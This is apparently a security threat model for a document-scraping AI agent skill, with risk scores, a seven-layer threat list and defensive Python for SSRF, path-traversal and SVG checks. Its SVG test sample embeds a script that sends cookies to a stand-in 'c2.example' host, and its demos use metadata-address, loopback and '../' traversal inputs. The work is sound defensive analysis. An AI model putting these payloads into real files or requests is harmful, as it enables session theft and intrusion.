wps-doc-scraper — agentic threat model
The wps-doc-scraper agent presents moderate risk: it fetches remote URLs through a browser and writes files locally, so an untrusted input link can turn into SSRF against whatever network the agent runs in, an overwrite of local files, or delivery of malicious content to whoever opens the output (an emitted SVG, for example, can carry active content).
OWASP AIVSS score rationale
| Agentic risk factor | Score |
|---|---|
| Autonomy of Action | 0.40 |
| Goal-Driven Planning | 0.20 |
| Self-Modification | 0.00 |
| Dynamic Tool Use | 0.50 |
| Persistent Memory | 0.10 |
| Contextual Awareness | 0.30 |
| Dynamic Identity | 0.10 |
| Multi-Agent Interactions | 0.00 |
| Non-Determinism | 0.20 |
| Opacity & Reflexivity | 0.20 |
Scored with the canonical OWASP AIVSS formula (see the AIVSS calculator reference); the agentic risk factors are estimated from the agent’s described capabilities, not from a review of its code.
MAESTRO 7-layer threat model
Per-layer threats for this agent. Layers marked “Not certain from the listing” carry general, caveated commentary because the public description does not pin down that layer.
Layer 1, Foundation Models. Not certain from the listing: the underlying LLM is not specified. The primary threat is indirect prompt injection via scraped document content, which could hijack the agent's parsing or output-generation logic.
Layer 2, Data Operations. The agent processes external, untrusted document data (WPS/KDocs links, ProcessOn canvases). Threats include poisoning of the output Markdown/SVG files and exfiltration of sensitive data if private links are mistakenly processed.
Layer 3, Agent Frameworks. The agent uses tools to fetch remote documents and write files locally. Insecure tool integration is the major threat, specifically path traversal or arbitrary local file write when saving the SVG/PNG and Markdown outputs.
Layer 4, Deployment and Infrastructure. Not certain from the listing: the hosting environment is unspecified. Because the agent fetches remote documents through a browser and writes files locally, there is a high risk of Server-Side Request Forgery (SSRF) against internal services or cloud metadata endpoints, and of container/host compromise if the agent is not sandboxed.
Layer 5, Evaluation and Observability. Not certain from the listing: no logging, guardrails, or observability mechanisms are mentioned for monitoring scraping activity or detecting malicious payloads in fetched documents.
Layer 6, Security and Compliance. Not certain from the listing: no authentication, authorization, or compliance controls are described. The agent operates as a free, open-source community skill without explicit access controls.
Layer 7, Agent Ecosystem. As a community agent skill it may be integrated into larger multi-agent workflows. The primary threat is cascading failure or downstream compromise if another agent trusts its scraped and formatted output without validation.
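The two tool-boundary threats above, arbitrary local file write and SSRF, are both input-validation problems. The following Python is an added example, not code from the wps-doc-scraper skill: it allowlists the document hosts the agent legitimately needs, refuses URLs that resolve to non-public addresses, and confines every output path to one directory. The host list, the output directory, the accepted file types and the offline demo_resolver table are assumptions.

```python
"""Input-side guards for a document-scraping agent: an SSRF check on the URL the
browser is told to fetch, and a path-confinement check on the file the agent is
told to write. Added example, not wps-doc-scraper code; the allowed hosts, the
output directory and the demo resolver table are assumptions."""
import ipaddress
import socket
from pathlib import Path
from urllib.parse import urlsplit

# Assumption: the agent only needs these document hosts (WPS/KDocs, ProcessOn).
ALLOWED_HOST_SUFFIXES = ("kdocs.cn", "wps.cn", "processon.com")
# Assumption: the only artefact types the agent is supposed to write.
ALLOWED_OUTPUT_SUFFIXES = {".md", ".svg", ".png"}


def host_allowed(host):
    h = host.lower().rstrip(".")
    return any(h == s or h.endswith("." + s) for s in ALLOWED_HOST_SUFFIXES)


def is_non_public(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def check_fetch_url(url, resolver=socket.getaddrinfo):
    """Return (ok, reason). Rejects non-https, embedded credentials, literal
    IPs, hosts outside the allowlist and hosts that resolve to non-public
    ranges (the usual SSRF pivot to 127.0.0.1 or 169.254.169.254).
    Caveat: the browser resolves the name again at fetch time, so a DNS
    rebinding attacker can race this check; enforce the same policy at an
    egress proxy or network policy as well."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False, "scheme must be https"
    if parts.username or parts.password:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        ipaddress.ip_address(host)
        return False, "literal IP address"   # the allowlist is name-based only
    except ValueError:
        pass
    if not host_allowed(host):
        return False, "host not in allowlist"
    try:
        infos = resolver(host, 443, proto=socket.IPPROTO_TCP)
    except OSError:
        return False, "DNS resolution failed"
    if any(is_non_public(info[4][0]) for info in infos):
        return False, "resolves to non-public address"
    return True, "ok"


def check_output_path(base_dir, requested_name):
    """Return (ok, reason_or_path). Resolves requested_name under base_dir and
    refuses anything that escapes it ('../x', absolute paths, symlink hops)
    or is not one of the expected artefact types."""
    base = Path(base_dir).resolve()
    candidate = (base / requested_name).resolve()
    if candidate == base or base not in candidate.parents:
        return False, f"escapes {base}"
    if candidate.suffix.lower() not in ALLOWED_OUTPUT_SUFFIXES:
        return False, f"unexpected output type {candidate.suffix!r}"
    return True, str(candidate)


def demo_resolver(host, port, proto=0):
    """Constructed, offline stand-in for socket.getaddrinfo (assumption)."""
    table = {"www.kdocs.cn": "93.184.216.34",        # a public address
             "rebound.kdocs.cn": "169.254.169.254"}  # cloud metadata address
    if host not in table:
        raise socket.gaierror(f"no such host: {host}")
    return [(socket.AF_INET, socket.SOCK_STREAM, proto, "", (table[host], port))]


if __name__ == "__main__":
    for u in ("https://www.kdocs.cn/l/abc", "https://rebound.kdocs.cn/l/abc",
              "http://www.kdocs.cn/l/abc", "https://127.0.0.1/latest/meta-data/",
              "https://kdocs.cn.attacker.example/"):
        print(u, check_fetch_url(u, demo_resolver))
    for n in ("doc/report.md", "../escape.md", "/etc/passwd", "payload.html"):
        print(n, check_output_path("out", n))
```

The URL check is deliberately name-based (a literal IP never passes) and resolves the name itself, but the browser resolves it again when it fetches, so the same policy belongs at an egress proxy or network policy too; otherwise DNS rebinding can race the check. The path check resolves symlinks before comparing, which is what defeats a planted link inside the output directory.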
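For the output-poisoning threat in layer 2 and the downstream-trust threat in layer 7, a consumer of the agent's SVG needs a concrete gate rather than trust. This Python is an added example, not part of wps-doc-scraper: it parses an emitted SVG and flags the constructs that execute or load remote content when the file is opened in a browser (script and foreignObject elements, on* event attributes, javascript: and external hrefs, url() in styles). The sample documents are constructed.

```python
"""Output-side check for the SVG a scraper agent emits (or a downstream agent
consumes): flag the constructs that turn an image into executable content when
opened in a browser. Added example, not wps-doc-scraper code; the sample
documents below are constructed."""
import xml.etree.ElementTree as ET

# Elements that embed script or foreign HTML inside an SVG document.
DANGEROUS_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# Attributes that can carry a reference to external or scriptable content.
REFERENCE_ATTRIBUTES = {"href", "src"}


def _local(qname):
    """Strip an ElementTree '{namespace}' prefix and lowercase the name."""
    return qname.rsplit("}", 1)[-1].lower()


def audit_svg(svg_text):
    """Return a list of findings; an empty list means nothing suspicious.
    Caveat: ElementTree still expands internal entities, so size-limit the
    input or parse with defusedxml before calling this on untrusted data."""
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        if not isinstance(el.tag, str):      # comments / processing instructions
            continue
        tag = _local(el.tag)
        if tag in DANGEROUS_ELEMENTS:
            findings.append(f"<{tag}> element")
        if tag == "style" and el.text and ("url(" in el.text or "@import" in el.text):
            findings.append("<style> with external reference")
        for attr, value in el.attrib.items():
            name = _local(attr)              # xlink:href arrives as {xlink-ns}href
            v = value.strip().lower()
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name in REFERENCE_ATTRIBUTES:
                if v.startswith(("javascript:", "data:", "vbscript:")):
                    findings.append(f"scriptable {name} on <{tag}>")
                elif v.startswith(("http:", "https:", "//")):
                    findings.append(f"external {name} on <{tag}>")
            elif name == "style" and "url(" in v:
                findings.append(f"style attribute with url() on <{tag}>")
    return findings


def accept_output(svg_text):
    """Gate a downstream consumer applies before trusting scraped SVG."""
    return audit_svg(svg_text) == []


# Constructed samples (assumptions, not real scraper output).
CLEAN_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
             '<defs><rect id="a" width="10" height="10"/></defs><use href="#a"/></svg>')
POISONED_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" '
                'xmlns:xlink="http://www.w3.org/1999/xlink">'
                '<script>fetch("https://c2.example/?d="+document.cookie)</script>'
                '<a xlink:href="javascript:alert(1)"><text onclick="go()">hi</text></a>'
                '<image xlink:href="https://c2.example/t.png"/></svg>')

if __name__ == "__main__":
    for name, doc in (("clean", CLEAN_SVG), ("poisoned", POISONED_SVG)):
        print(name, audit_svg(doc))
```

Rejecting outright is the safer default for a gate: a downstream agent that renders or re-embeds the SVG inherits whatever the scraped source planted in it, and rewriting the document to strip those constructs is a larger job than refusing it. Apply a size cap or defusedxml before handing untrusted XML to the standard-library parser.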
MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).